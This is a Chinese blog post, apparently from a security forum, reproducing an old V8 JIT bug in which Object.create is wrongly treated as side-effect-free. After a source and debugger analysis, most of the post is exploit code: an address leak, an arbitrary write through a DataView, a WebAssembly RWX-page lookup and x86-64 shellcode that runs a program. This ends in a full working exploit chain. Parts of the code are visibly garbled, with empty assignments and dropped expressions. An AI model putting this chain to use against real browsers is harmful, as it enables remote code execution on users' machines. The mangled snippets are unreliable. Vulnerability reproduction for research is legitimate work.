2022-10-29 18:8:34 Author: 看雪学苑(查看原文) 阅读量:14 收藏



这个漏洞在Chrome Bug的网页上,有很多的相关信息,我们可以在其中找到存在漏洞的版本,可以看到相关的PoC,为我们的复现做准备,这里放一下链接(第一次复现不了解,当时找链接找了半天):
git checkout 568979f4d891bafec875fab20f608ff9392f4f29./tools/dev/ x64.debug -vvninja -C #如果需要release版本的话,把x64.debug换成x64.release即可,这里为了调试方便,我是用的debug版本


//poc.js(function() {  function f(o) {    o.x;    Object.create(o);    return o.y.a;  }  f({ x : 0, y : { a : 1 } });  f({ x : 0, y : { a : 2 } });  %OptimizeFunctionOnNextCall(f);  assertEquals(3, f({ x : 0, y : { a : 3 } }));})();(function() {  function f(o) {    let a = o.y;    Object.create(o);    return o.x + a;  }  f({ x : 42, y : 21 });  f({ x : 42, y : 21 });  %OptimizeFunctionOnNextCall(f);  assertEquals(63, f({ x : 42, y : 21 }));})();
@@ -622,7 +622,7 @@   V(CreateKeyValueArray, Operator::kEliminatable, 2, 1)                \   V(CreatePromise, Operator::kEliminatable, 0, 1)                      \   V(CreateTypedArray, Operator::kNoProperties, 5, 1)                   \-  V(CreateObject, Operator::kNoWrite, 1, 1)                            \+  V(CreateObject, Operator::kNoProperties, 1, 1)                       \   V(ObjectIsArray, Operator::kNoProperties, 1, 1)                      \   V(HasProperty, Operator::kNoProperties, 2, 1)                        \   V(HasInPrototypeChain, Operator::kNoProperties, 2, 1)                \
//operator.h enum Property {    kNoProperties = 0,    kCommutative = 1 << 0,  // OP(a, b) == OP(b, a) for all inputs.    kAssociative = 1 << 1,  // OP(a, OP(b,c)) == OP(OP(a,b), c) for all inputs.    kIdempotent = 1 << 2,   // OP(a); OP(a) == OP(a).    kNoRead = 1 << 3,       // Has no scheduling dependency on Effects    kNoWrite = 1 << 4,      // Does not modify any Effects and thereby                            // create new scheduling dependencies.    kNoThrow = 1 << 5,      // Can never generate an exception.    kNoDeopt = 1 << 6,      // Can never generate an eager deoptimization exit.    kFoldable = kNoRead | kNoWrite,    kKontrol = kNoDeopt | kFoldable | kNoThrow,    kEliminatable = kNoDeopt | kNoWrite | kNoThrow,    kPure = kNoDeopt | kNoRead | kNoWrite | kNoThrow | kIdempotent  };
../../ poc.js --allow-natives-syntax --trace-turbo
python -m SimpleHTTPServer
将生成的json文件打开就行了,经过观察以后发现,CreateObject节点在generic lowering阶段,变为了Call:

TF_BUILTIN(CreateObjectWithoutProperties, ObjectBuiltinsAssembler) {  Node* const prototype = Parameter(Descriptor::kPrototypeArg);  Node* const context = Parameter(Descriptor::kContext);  Node* const native_context = LoadNativeContext(context);  Label call_runtime(this, Label::kDeferred), prototype_null(this),      prototype_jsreceiver(this);  {    Comment("Argument check: prototype");    GotoIf(IsNull(prototype), &prototype_null);    BranchIfJSReceiver(prototype, &prototype_jsreceiver, &call_runtime);  }    ..........  BIND(&call_runtime);  {    Comment("Call Runtime (prototype is not null/jsreceiver)");    Node* result = CallRuntime(Runtime::kObjectCreate, context, prototype,                               UndefinedConstant());    Return(result);  }}
RUNTIME_FUNCTION(Runtime_ObjectCreate) {  HandleScope scope(isolate);  Handle<Object> prototype =;  Handle<Object> properties =;  Handle<JSObject> obj;  // 1. If Type(O) is neither Object nor Null, throw a TypeError exception.  if (!prototype->IsNull(isolate) && !prototype->IsJSReceiver()) {    THROW_NEW_ERROR_RETURN_FAILURE(        isolate, NewTypeError(MessageTemplate::kProtoObjectOrNull, prototype));  }  // 2. Let obj be ObjectCreate(O).  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(      isolate, obj, JSObject::ObjectCreate(isolate, prototype));   // 3. If Properties is not undefined, then  if (!properties->IsUndefined(isolate)) {    // a. Return ? ObjectDefineProperties(obj, Properties).    // Define the properties if properties was specified and is not undefined.    RETURN_RESULT_OR_FAILURE(        isolate, JSReceiver::DefineProperties(isolate, obj, properties));  }  // 4. Return obj.  return *obj;}
// 9.1.12 ObjectCreate ( proto [ , internalSlotsList ] )// Notice: This is NOT Object.create ( O, Properties )MaybeHandle<JSObject> JSObject::ObjectCreate(Isolate* isolate,                                             Handle<Object> prototype) {  // Generate the map with the specified {prototype} based on the Object  // function's initial map from the current native context.  // TODO(bmeurer): Use a dedicated cache for Object.create; think about  // slack tracking for Object.create.  Handle<Map> map =      Map::GetObjectCreateMap(isolate, Handle<HeapObject>::cast(prototype));   // Actually allocate the object.  Handle<JSObject> object;  if (map->is_dictionary_map()) {    object = isolate->factory()->NewSlowJSObjectFromMap(map);  } else {    object = isolate->factory()->NewJSObjectFromMap(map);  }  return object;}
Handle<Map> Map::GetObjectCreateMap(Isolate* isolate,                                    Handle<HeapObject> prototype) {  Handle<Map> map(isolate->native_context()->object_function()->initial_map(),                  isolate);  if (map->prototype() == *prototype) return map;  if (prototype->IsNull(isolate)) {    return isolate->slow_object_with_null_prototype_map();  }  if (prototype->IsJSObject()) {    Handle<JSObject> js_prototype = Handle<JSObject>::cast(prototype);    if (!js_prototype->map()->is_prototype_map()) {      JSObject::OptimizeAsPrototype(js_prototype);    }    Handle<PrototypeInfo> info =        Map::GetOrCreatePrototypeInfo(js_prototype, isolate);    // TODO(verwaest): Use inobject slack tracking for this map.    if (info->HasObjectCreateMap()) {      map = handle(info->ObjectCreateMap(), isolate);    } else {      map = Map::CopyInitialMap(isolate, map);      Map::SetPrototype(isolate, map, prototype);      PrototypeInfo::SetObjectCreateMap(info, map);    }    return map;  }   return Map::TransitionToPrototype(isolate, map, prototype);}
void JSObject::OptimizeAsPrototype(Handle<JSObject> object,                                   bool enable_setup_mode) {  if (object->IsJSGlobalObject()) return;  if (enable_setup_mode && PrototypeBenefitsFromNormalization(object)) {    // First normalize to ensure all JSFunctions are DATA_CONSTANT.    JSObject::NormalizeProperties(object, KEEP_INOBJECT_PROPERTIES, 0,                                  "NormalizeAsPrototype");  }  if (object->map()->is_prototype_map()) {    if (object->map()->should_be_fast_prototype_map() &&        !object->HasFastProperties()) {      JSObject::MigrateSlowToFast(object, 0, "OptimizeAsPrototype");    }  } else {    Handle<Map> new_map = Map::Copy(object->GetIsolate(),                                    handle(object->map(), object->GetIsolate()),                                    "CopyAsPrototype");    JSObject::MigrateToMap(object, new_map);    object->map()->set_is_prototype_map(true);     // Replace the pointer to the exact constructor with the Object function    // from the same context if undetectable from JS. This is to avoid keeping    // memory alive unnecessarily.    Object* maybe_constructor = object->map()->GetConstructor();    if (maybe_constructor->IsJSFunction()) {      JSFunction* constructor = JSFunction::cast(maybe_constructor);      if (!constructor->shared()->IsApiFunction()) {        Context* context = constructor->context()->native_context();        JSFunction* object_function = context->object_function();        object->map()->SetConstructor(object_function);      }    }  }}
static bool PrototypeBenefitsFromNormalization(Handle<JSObject> object) {  DisallowHeapAllocation no_gc;  if (!object->HasFastProperties()) return false;  if (object->IsJSGlobalProxy()) return false;  if (object->GetIsolate()->bootstrapper()->IsActive()) return false;  return !object->map()->is_prototype_map() ||         !object->map()->should_be_fast_prototype_map();}
void JSObject::NormalizeProperties(Handle<JSObject> object,                                   PropertyNormalizationMode mode,                                   int expected_additional_properties,                                   const char* reason) {  if (!object->HasFastProperties()) return;   Handle<Map> map(object->map(), object->GetIsolate());  Handle<Map> new_map = Map::Normalize(object->GetIsolate(), map, mode, reason);   MigrateToMap(object, new_map, expected_additional_properties);}
Handle<Map> Map::Normalize(Isolate* isolate, Handle<Map> fast_map,                           PropertyNormalizationMode mode, const char* reason) {  DCHECK(!fast_map->is_dictionary_map());   Handle<Object> maybe_cache(isolate->native_context()->normalized_map_cache(),                             isolate);  bool use_cache =      !fast_map->is_prototype_map() && !maybe_cache->IsUndefined(isolate);  Handle<NormalizedMapCache> cache;  if (use_cache) cache = Handle<NormalizedMapCache>::cast(maybe_cache);   Handle<Map> new_map;  if (use_cache && cache->Get(fast_map, mode).ToHandle(&new_map)) {#ifdef VERIFY_HEAP    if (FLAG_verify_heap) new_map->DictionaryMapVerify(isolate);#endif#ifdef ENABLE_SLOW_DCHECKS    if (FLAG_enable_slow_asserts) {      // The cached map should match newly created normalized map bit-by-bit,      // except for the code cache, which can contain some ICs which can be      // applied to the shared map, dependent code and weak cell cache.      Handle<Map> fresh = Map::CopyNormalized(isolate, fast_map, mode);       if (new_map->is_prototype_map()) {        // For prototype maps, the PrototypeInfo is not copied.        DCHECK_EQ(0, memcmp(reinterpret_cast<void*>(fresh->address()),                            reinterpret_cast<void*>(new_map->address()),                            kTransitionsOrPrototypeInfoOffset));        DCHECK_EQ(fresh->raw_transitions(),                  MaybeObject::FromObject(Smi::kZero));        STATIC_ASSERT(kDescriptorsOffset ==                      kTransitionsOrPrototypeInfoOffset + kPointerSize);        DCHECK_EQ(0, memcmp(HeapObject::RawField(*fresh, kDescriptorsOffset),                            HeapObject::RawField(*new_map, kDescriptorsOffset),                            kDependentCodeOffset - kDescriptorsOffset));      } else {        DCHECK_EQ(0, memcmp(reinterpret_cast<void*>(fresh->address()),                            reinterpret_cast<void*>(new_map->address()),                            Map::kDependentCodeOffset));      }      STATIC_ASSERT(Map::kPrototypeValidityCellOffset ==                    Map::kDependentCodeOffset + kPointerSize);      int offset = Map::kPrototypeValidityCellOffset + kPointerSize;      DCHECK_EQ(0, memcmp(reinterpret_cast<void*>(fresh->address() + offset),                          reinterpret_cast<void*>(new_map->address() + offset),                          Map::kSize - offset));    }#endif  } else {    new_map = Map::CopyNormalized(isolate, fast_map, mode);    if (use_cache) {      cache->Set(fast_map, new_map);      isolate->counters()->maps_normalized()->Increment();    }    if (FLAG_trace_maps) {      LOG(isolate, MapEvent("Normalize", *fast_map, *new_map, reason));    }  }  fast_map->NotifyLeafMapLayoutChange(isolate);  return new_map;}
当不满足条件:use_cache && cache->Get(fast_map, mode).ToHandle(&new_map)时,将会产生新的Map:new_map = Map::CopyNormalized(isolate, fast_map, mode);,这里use_cache我个人猜测应该是检索是否已有的Map,因为在v8中,Map不被使用时,通常不会被直接移除,因为可能会在后面使用,我们继续跟进CopyNormalized,来看看map是否变化:
Handle<Map> Map::CopyNormalized(Isolate* isolate, Handle<Map> map,                                PropertyNormalizationMode mode) {  int new_instance_size = map->instance_size();  if (mode == CLEAR_INOBJECT_PROPERTIES) {    new_instance_size -= map->GetInObjectProperties() * kPointerSize;  }   Handle<Map> result = RawCopy(      isolate, map, new_instance_size,      mode == CLEAR_INOBJECT_PROPERTIES ? 0 : map->GetInObjectProperties());  // Clear the unused_property_fields explicitly as this field should not  // be accessed for normalized maps.  result->SetInObjectUnusedPropertyFields(0);  result->set_is_dictionary_map(true);  result->set_is_migration_target(false);  result->set_may_have_interesting_symbols(true);  result->set_construction_counter(kNoSlackTracking); #ifdef VERIFY_HEAP  if (FLAG_verify_heap) result->DictionaryMapVerify(isolate);#endif   return result;}
void Map::set_is_dictionary_map(bool value) {  uint32_t new_bit_field3 = IsDictionaryMapBit::update(bit_field3(), value);  new_bit_field3 = IsUnstableBit::update(new_bit_field3, value);  set_bit_field3(new_bit_field3);}
这个函数调用了Update,将Map更新为dictionary map,那么很显然,CreateObject函数并不是kNoWrite的,那么漏洞为什么会出现也很清楚了:当调用Object.create 时,然后由于错误的被标识为kNoWrite,并且在优化过程中被替换为CreateObjectWithoutProperties,又由于优化过程中省略了一系列的检查,没有探测到Map的改变,从而导致了漏洞的产生。
//myPoc.jsfunction triggerVul(obj){    obj.x;    Object.create(obj);    return obj.y;}var obj = {"x":11};obj.y = 22;triggerVul(obj);triggerVul(obj);for(let i = 0;i<10000;i++){var obj = {"x":11};obj.y = 22;var result = triggerVul(obj);if(result!=22){    console.log("\033[32m[!] Vul has been triggered!\033[0m");    break;}}

//test.jsvar obj = {"a":1,"b":2};obj.c=11;obj.d=22;%DebugPrint(obj);Object.create(obj);%DebugPrint(obj);%SystemBreak();
gdb ./d8set args --allow-natives-syntax ./test.jsr
第一次DebugPrint:0x1866d7b8e1b1: [JS_OBJECT_TYPE] - map: 0x181a3138ca71 <Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x03ce280846d9 <Object map = 0x181a313822f1> - elements: 0x108cb1b82cf1 <FixedArray[0]> [HOLEY_ELEMENTS] - properties: 0x1866d7b8e2c9 <PropertyArray[3]> {    #a: 1 (data field 0)    #b: 2 (data field 1)    #c: 11 (data field 2) properties[0]    #d: 22 (data field 3) properties[1] } 第二次DebugPrint:0x1866d7b8e1b1: [JS_OBJECT_TYPE] - map: 0x181a3138cb11 <Map(HOLEY_ELEMENTS)> [DictionaryProperties] - prototype: 0x03ce280846d9 <Object map = 0x181a313822f1> - elements: 0x108cb1b82cf1 <FixedArray[0]> [HOLEY_ELEMENTS] - properties: 0x1866d7b8e371 <NameDictionary[53]> {   #d: 22 (data, dict_index: 4, attrs: [WEC])   #a: 1 (data, dict_index: 1, attrs: [WEC])   #b: 2 (data, dict_index: 2, attrs: [WEC])   #c: 11 (data, dict_index: 3, attrs: [WEC]) }
0x1866d7b8e371: [ObjectHashTable] - map: 0x108cb1b83669 <Map> - length: 53 - elements: 4 - deleted: 0 - capacity: 16 - elements: {           0: 5 -> 0           1: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>           2: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>           3: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>           4: 0x33fa0db050a1 <String[1]: d> -> 22           5: 1216 -> 0x03ce280a2991 <String[1]: a>           6: 1 -> 448           7: 0x03ce280a29a9 <String[1]: b> -> 2           8: 704 -> 0x108cb1b825a1 <undefined>           9: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>          10: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>          11: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>          12: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>          13: 0x108cb1b825a1 <undefined> -> 0x108cb1b825a1 <undefined>          14: 0x108cb1b825a1 <undefined> -> 0x33fa0db068c9 <String[1]: c>          15: 11 -> 960 }
pwndbg> x/20gx 0x1866d7b8e2c9-10x1866d7b8e2c8:    0x0000108cb1b83899    0x00000003000000000x1866d7b8e2d8:    0x0000000b00000000    0x00000016000000000x1866d7b8e2e8:    0x0000108cb1b825a1    0x0000108cb1b823410x1866d7b8e2f8:    0x0000000e00000000    0x00000004000000000x1866d7b8e308:    0x0000108cb1b846f9    0x000003ce280a29910x1866d7b8e318:    0x0000014000000000    0x00000001000000000x1866d7b8e328:    0x000003ce280a29a9    0x00100540000000000x1866d7b8e338:    0x0000000100000000    0x000033fa0db068c90x1866d7b8e348:    0x0020094000000000    0x00000001000000000x1866d7b8e358:    0x000033fa0db050a1    0x00300d4000000000
function create(){    var obj = {a:123};    for(let i = 0;i<30;i++){        eval(`obj.${'b'+i} = 456-i`);    }    return obj;} let obj_array=[]; /*function triggerVul(obj){    obj.a;    this.Object.create(obj);    eval(`    ${ => `let ${b} = obj.${b};`).join('\n')}    `);}*/ function find(){    for (let i = 0;i<40;i++){        obj_array[i] = 'b'+i;    }    eval(`        function triggerVul(obj){            obj.a;            this.Object.create(obj);            ${        (b) => `let ${b} = obj.${b};`        ).join('\n')}            return [${obj_array.join(', ')}];        }    `);    for(let i = 0;i<10000;i++){        let obj = create();        let array = triggerVul(obj);        for(let j = 0;j<array.length;j++){            if(array[j]!=456-j&&array[j]<456&&array[j]>(456-39)){                console.log("\033[1;32m[*] find two : \033[0m"+'b'+j+" and "+'b'+(456-array[j]));                return ['b'+j , 'b' + (456-array[j])];            }        }    }} find();
var obj1 = {a:1,b:2,c:3};obj1.d = 4;var obj2 = {a:5,b:6,c:7};obj2.d = 8;Object.create(obj1);Object.create(obj2);%DebugPrint(obj1);%DebugPrint(obj2);%SystemBreak();
obj1: 0x32d124d8e401: [ObjectHashTable] - map: 0x236b46483669 <Map> - length: 53 - elements: 4 - deleted: 0 - capacity: 16 - elements: {           0: 5 -> 0           1: 0x201e9c6a2991 <String[1]: a> -> 1           2: 448 -> 0x236b464825a1 <undefined>           3: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           4: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           5: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           6: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           7: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           8: 0x236b464825a1 <undefined> -> 0x0bbcf4f050a1 <String[1]: d>           9: 4 -> 1216          10: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>          11: 0x236b464825a1 <undefined> -> 0x0bbcf4f068c9 <String[1]: c>          12: 3 -> 960          13: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>          14: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>          15: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined> } obj2: 0x32d124d8e5f1: [ObjectHashTable] - map: 0x236b46483669 <Map> - length: 53 - elements: 4 - deleted: 0 - capacity: 16 - elements: {           0: 5 -> 0           1: 0x201e9c6a2991 <String[1]: a> -> 5           2: 448 -> 0x236b464825a1 <undefined>           3: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           4: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           5: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           6: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           7: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>           8: 0x236b464825a1 <undefined> -> 0x0bbcf4f050a1 <String[1]: d>           9: 8 -> 1216          10: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>          11: 0x236b464825a1 <undefined> -> 0x0bbcf4f068c9 <String[1]: c>          12: 7 -> 960          13: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>          14: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined>          15: 0x236b464825a1 <undefined> -> 0x236b464825a1 <undefined> }
let C1 = 0;let C2 = 0; function leak_obj_create(target){        var obj = {a:123};        for(let i = 0; i<30; i++){                if('b'+i!=C1&&'b'+i!=C2){                        eval(`obj.${'b'+i} = 456;`);                }                else if('b'+i==C1){                        eval(`obj.${C1} = {c10:1.1,c11:2.2};`);                }                else if('b'+i==C2){                        eval(`obj.${C2} = {c20:target};`);                }        }        return obj;} function leak(target){        eval(`        function triggerVul(target)        {        target.a;        this.Object.create(target);        return target.${C1}.c10;        }                `);         for(let i = 0; i<10000; i++){                var obj = leak_obj_create(target);                var leak_addr = triggerVul(obj);                if(leak_addr!=1.1&&leak_addr!=456&&leak_addr!=undefined){                         console.log("\033[1;32m[*] target addr is leaked: \033[0m 0x" + (f_to_i(leak_addr)));                         return f_to_i(leak_addr);                }        }} [C1,C2] = find();var buffer = new ArrayBuffer(0x100);leak(buffer);
然后我们需要任意地址写入,方法与leak差不多,只是我们在创建时,不能obj.C1 = {c11:1.1,c12:2.2}这样了,因为我们写是需要些对象的某个元素写入,那么我们可以按照如下方法构造:
obj.C1 = {c10:{c11:1.1,c12:2.2}};obj.C2 = {c20:target};
这样让obj.C1.c10对应obj.C2.c20,那么我们操作c10的元素,就可以实现对target的属性的操作,而我们希望操作的是DataView的backing store,这样就可以利用dataview实现任意地址写,代码如下:
function write_obj_create(target){        var obj = {a:123};        for(let i = 0; i<30; i++){                if('b'+i!=C1&&'b'+i!=C2){                        eval(`obj.${'b'+i} = {};`);                }                else if('b'+i==C1){                        eval(`obj.${C1} = {c10:{c11:1.1,c12:2.2}};`);                }                else if('b'+i==C2){                        eval(`obj.${C2} = {c20:target};`);                }        }        return obj;} function write(target,data){    eval(`    function triggerVul(target,data){        target.a;        this.Object.create(target);        let sign = target.${C1}.c10.c12;        target.${C1}.c10.c12 = (data);        return sign;    }           `);    for(let i = 0; i<10000; i++){                var obj = write_obj_create(target);                var sign = triggerVul(obj,data);        if(sign!=2.2){            console.log("\033[1;32m[*] target addr has been write with data: \033[0m " + f_to_i(data));            return ;        }    }    console.log("\033[1;31m[!]Failed to Write Data! \033[0m "); }
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule = new WebAssembly.Module(wasmCode);var wasmInstance = new WebAssembly.Instance(wasmModule, {});var wasm = wasmInstance.exports.main; wasm();
wasmCode我是采用在线网站生成的:,直接用它默认的那个return 42就行,在初始化之后,我们需要找到rwx段所在的位置,这个调试慢慢找就行了,我这里给出我找到的路线:
wasmFunctionaddr    ==>    SharedInfo        ==>        WasmExportedFunctionData            ==>            Instance                ==>                Instance+0xe8+0x8(直接vmmap看就能发现这里是有rwx权限的)
var buf = new ArrayBuffer(16);var f64 = new Float64Array(buf);var i32 = new Uint32Array(buf); function f_to_i(target){    f64[0] = target;    let tmp = Array.from(i32);    return tmp[1] * 0x100000000 + tmp[0];} function i_to_f(target){    let tmp = [];    tmp[0] = parseInt(target % 0x100000000);    tmp[1] = parseInt((target-tmp[0]) / 0x100000000);    i32.set(tmp);    return f64[0];} function hex(target){    return target.toString(16).padStart(16,"0");} function gc(){    for(var i=0;i<((1024 * 1024)/0x10);i++)    {        var a= new String();    }} function create(){    var obj = {a:123};    for(let i = 0;i<30;i++){        eval(`obj.${'b'+i} = 456-i`);    }    return obj;} let obj_array=[]; /*function triggerVul(obj){    obj.a;    this.Object.create(obj);    eval(`    ${ => `let ${b} = obj.${b};`).join('\n')}    `);}*/ function find(){    for (let i = 0;i<40;i++){        obj_array[i] = 'b'+i;    }    eval(`        function triggerVul(obj){            obj.a;            this.Object.create(obj);            ${        (b) => `let ${b} = obj.${b};`        ).join('\n')}            return [${obj_array.join(', ')}];        }    `);    for(let i = 0;i<10000;i++){        let obj = create();        let array = triggerVul(obj);        for(let j = 0;j<array.length;j++){            if(array[j]!=456-j&&array[j]<456&&array[j]>(456-39)){                console.log("\033[1;32m[*] find two : \033[0m"+'b'+j+" and "+'b'+(456-array[j]));                return ['b'+j , 'b' + (456-array[j])];            }        }    }} let C1 = 0;let C2 = 0; function leak_obj_create(target){    var obj = {a:123};    for(let i = 0; i<30; i++){        if('b'+i!=C1&&'b'+i!=C2){            eval(`obj.${'b'+i} = 1.1;`);        }        else if('b'+i==C1){            eval(`obj.${C1} = {c10:1.1,c11:2.2};`);            //eval(`obj.${C1} = 1.1;`)        }        else if('b'+i==C2){            eval(`obj.${C2} = {c20:target};`);            //eval(`obj.${C2} = target;`)        }    }    return obj;} function leak(target){        eval(`        function triggerVul(target)        {        target.a;        this.Object.create(target);        return target.${C1}.c10;        }                `);     for(let i = 0; i<10000; i++){        var obj = leak_obj_create(target);        var leak_addr = triggerVul(obj);        if(leak_addr!=1.1&&leak_addr!=undefined){             console.log("\033[1;32m[*] target addr is leaked: \033[0m " + (f_to_i(leak_addr)));             return f_to_i(leak_addr);        }    }} function write_obj_create(target){        var obj = {a:123};        for(let i = 0; i<30; i++){                if('b'+i!=C1&&'b'+i!=C2){                        eval(`obj.${'b'+i} = {};`);                }                else if('b'+i==C1){                        eval(`obj.${C1} = {c10:{c11:1.1,c12:2.2}};`);                }                else if('b'+i==C2){                        eval(`obj.${C2} = {c20:target};`);                }        }        return obj;} function write(target,data){    eval(`    function triggerVul(target,data){        target.a;        this.Object.create(target);        let sign = target.${C1}.c10.c12;        target.${C1}.c10.c12 = (data);        return sign;    }           `);    for(let i = 0; i<10000; i++){                var obj = write_obj_create(target);                var sign = triggerVul(obj,data);        if(sign!=2.2){            console.log("\033[1;32m[*] target addr has been write with data: \033[0m " + f_to_i(data));            return ;        }    }    console.log("\033[1;31m[!]Failed to Write Data! \033[0m "); } [C1,C2] = find();var buffer = new ArrayBuffer(0x200); var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule = new WebAssembly.Module(wasmCode);var wasmInstance = new WebAssembly.Instance(wasmModule, {});var wasm = wasmInstance.exports.main; wasm(); var wasm_addr = leak(wasm);write(buffer,i_to_f(wasm_addr)); let dataview = new DataView(buffer);shared_info = f_to_i(dataview.getFloat64(0x18-0x1,true));console.log("\033[1;32m[*] shared info addr is leaked: \033[0m " + (shared_info)); write(buffer,i_to_f((shared_info)));WasmFunc = f_to_i(dataview.getFloat64(0x8-0x1,true));console.log("\033[1;32m[*] wasm Func addr is leaked: \033[0m " + (WasmFunc)); write(buffer,i_to_f(WasmFunc));Instance = f_to_i(dataview.getFloat64(0x10-0x1,true));console.log("\033[1;32m[*] wasm Instance addr is leaked: \033[0m " + (Instance)); write(buffer,i_to_f(Instance));wasm_rwx = f_to_i(dataview.getFloat64(0xe8+0x8-0x1,true));console.log("\033[1;32m[*] wasm rwx addr is leaked: \033[0m " + (wasm_rwx)); write(buffer,i_to_f(wasm_rwx));  var shellcode = [72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 121, 98,96, 109, 98, 1, 1, 72, 49, 4, 36, 72, 184, 47, 117, 115, 114, 47, 98,105, 110, 80, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1,72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90,72, 1, 226, 82, 72, 137, 226, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72,184, 121, 98, 96, 109, 98, 1, 1, 1, 72, 49, 4, 36, 49, 246, 86, 106, 8,94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5]; for(let i=0;i<shellcode.length;i++){    dataview.setUint8(i,shellcode[i]);} wasm(); //%DebugPrint(buffer);//%DebugPrint(wasm);//%DebugPrint(shared_info);//%SystemBreak();
